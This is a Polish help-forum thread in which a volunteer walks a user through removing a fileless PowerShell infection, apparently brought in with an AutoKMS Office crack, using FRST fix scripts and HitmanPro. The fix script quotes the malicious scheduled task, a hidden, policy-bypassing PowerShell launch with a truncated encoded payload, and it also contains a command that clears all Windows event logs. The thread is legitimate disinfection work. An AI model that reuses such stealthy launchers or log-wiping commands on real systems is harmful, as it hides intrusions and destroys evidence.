tomektomek Opublikowano 2 Stycznia 2018 Zgłoś Udostępnij Opublikowano 2 Stycznia 2018 (edytowane) ESET wykrywa zagrożenie w pliku, po usunięciu pliku i restarcie to samo - plik się odnawia. System chodzi wolno, strony się nie ładują. FRST.txt Addition.txt Edytowane 2 Stycznia 2018 przez Miszel03 Poprawiam szyk zdania. //Miszel03 Odnośnik do komentarza
Miszel03 Opublikowano 2 Stycznia 2018 Zgłoś Udostępnij Opublikowano 2 Stycznia 2018 Brakuje raportu Shortcut, ale dostarczysz mi go w następnym poście - mamy teraz inne priorytety.W systemie aktywna jest infekcja bezplikowa (ciąg komend zakodowanych w PowerShell) - prawdopodobnie z tym ESET ma problem. Oprócz tego widać szczątki po adware.Dodam jeszcze, że infekcja ta przypuszczalnie została zawleczona wraz z instalacją crack do Office - AutoKMS, więc go usuwam. Malwarebytes przypuszczalnie jest również lewo aktywowany - w pliku Hosts wpisy blokujące aktualizacje (proszę powiedzieć czy mam go wyczyścić). Dezynfekcja: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses:CreateRestorePoint:Task: {1378A8D1-E70A-4821-B9D6-F07F3338AD15} - System32\Tasks\{0E0B0F47-7878-0A0D-7811-7F090D7D110D} => C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgADsAIAAgACAAIAA7ADsAOwA7ADsAOwAgACAAOwAgACAAIAAgADsAIAAgADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEA (dane wartości zawierają 10192 znaków więcej). Task: {017F40FC-D37E-4836-B8F4-E4F409F38786} - \e-pity2017_styczen -> Brak pliku Task: {34A507B5-8E15-41E8-89BE-D5173C81B095} - \e-pity2017_kwiecien -> Brak pliku Task: {4FAAC27C-3551-4899-962F-0C06E6FC9724} - \e-pity2016a_kwiecien -> Brak pliku Task: {D8BB0B2E-E9D5-4DDF-857E-361DC9CA2C2D} - \e-pity2016a_styczen -> Brak pliku Task: {837B4B0C-4F04-400E-A72E-FE84EA23F1AD} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2018-01-02] ()C:\WINDOWS\AutoKMSC:\Users\Waldek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnkC:\Users\Waldek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnkAlternateDataStreams: C:\ProgramData\TEMP:182F0EEA [448]AlternateDataStreams: C:\ProgramData\TEMP:F46D2E85 [488]HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia BootExecute: autocheck autochk * BootDefrag.exeGroupPolicy: Ograniczenia - Chrome HKU\S-1-5-21-3143409620-2237551117-509473781-1001\Software\Microsoft\Internet Explorer\Main,Start Page =S3 FoxitReaderService; "C:\Program Files (x86)\Foxit Reader\FoxitConnectedPDFService.exe" [X]S3 AndnetBus; \SystemRoot\System32\drivers\lgandnetbus64.sys [X]S3 AndNetDiag; \SystemRoot\system32\DRIVERS\lgandnetdiag64.sys [X]S3 ANDNetModem; \SystemRoot\system32\DRIVERS\lgandnetmodem64.sys [X]S3 ohci1394; \SystemRoot\System32\drivers\ohci1394.sys [X]S2 WCMVCAM; \SystemRoot\system32\DRIVERS\wcmvcam64.sys [X]2018-01-02 15:58 - 2018-01-02 16:04 - 000000000 ____D C:\Disk2018-01-02 15:58 - 2018-01-02 15:58 - 000000000 ____D C:\Windat2018-01-02 15:57 - 2018-01-02 15:57 - 000140800 _____ C:\Users\Waldek\AppData\Local\installer.datPowershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Przeskanuj system za pomocą programu HitmanPro, jeśli coś wykryję to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt. Odnośnik do komentarza
tomektomek Opublikowano 2 Stycznia 2018 Autor Zgłoś Udostępnij Opublikowano 2 Stycznia 2018 Zrobione Wynik Hitmanpro - http://pl.tinypic.com/view.php?pic=m79g0i&s=9 FRST.txt Addition.txt Shortcut.txt Fixlog.txt Odnośnik do komentarza
Miszel03 Opublikowano 2 Stycznia 2018 Zgłoś Udostępnij Opublikowano 2 Stycznia 2018 Infekcje usunięte, teraz tylko poprawki i mała diagnostyka folderu. 1. Zagrożenia wykryte przez HitmanPro daj do kasacji - opcja Usuń dla wszystkich (z pominięciem FRST bo to fałszywy alarm). Cześć po prostu się zdubluje, bo skaner wykrył również zagrożenia w kwarantannie FRST. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: ContextMenuHandlers1: [Foxit_ConvertToPDF_Reader] -> {A94757A0-0226-426F-B4F1-4DF381C630D3} => -> Brak pliku ContextMenuHandlers6: [Foxit_ConvertToPDF_Reader] -> {A94757A0-0226-426F-B4F1-4DF381C630D3} => -> Brak pliku ContextMenuHandlers6: [unlockerShellExtension] -> {DDE4BEEB-DDE6-48fd-8EB5-035C09923F83} => -> Brak pliku C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switlle\Fishing Simulator for Relax\Game Manual.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switlle\Fishing Simulator for Relax\License.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switlle\Fishing Simulator for Relax\Official Site.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switlle\Fishing Simulator for Relax\Register.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switlle\Fishing Simulator for Relax\Registration Notes.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switlle\Fishing Simulator for Relax\Uninstall Fishing Simulator for Relax.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Switlle\Fishing Simulator for Relax\View Game Statistic.lnk Folder: C:\Users\Waldek\AppData\Local\Tempzxpsigneb58a5959244d490 Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Przedstaw plik Fixlog, napisz jak oceniasz obecną sytuację - czy problem ustąpił? Odnośnik do komentarza
tomektomek Opublikowano 2 Stycznia 2018 Autor Zgłoś Udostępnij Opublikowano 2 Stycznia 2018 Zrobione Wydaje mi się, że jest okey Fixlog.txt Odnośnik do komentarza
Miszel03 Opublikowano 2 Stycznia 2018 Zgłoś Udostępnij Opublikowano 2 Stycznia 2018 Akcja pomyślnie wykonana.W lokalizacji C:\Users\Waldek\AppData\Local istnieje wiele pustych folderów, ich nazwa wygląda następująco: Tempzxpsign(LOSOWY CIĄG ZNAKÓW). Możesz je skasować. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows. Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się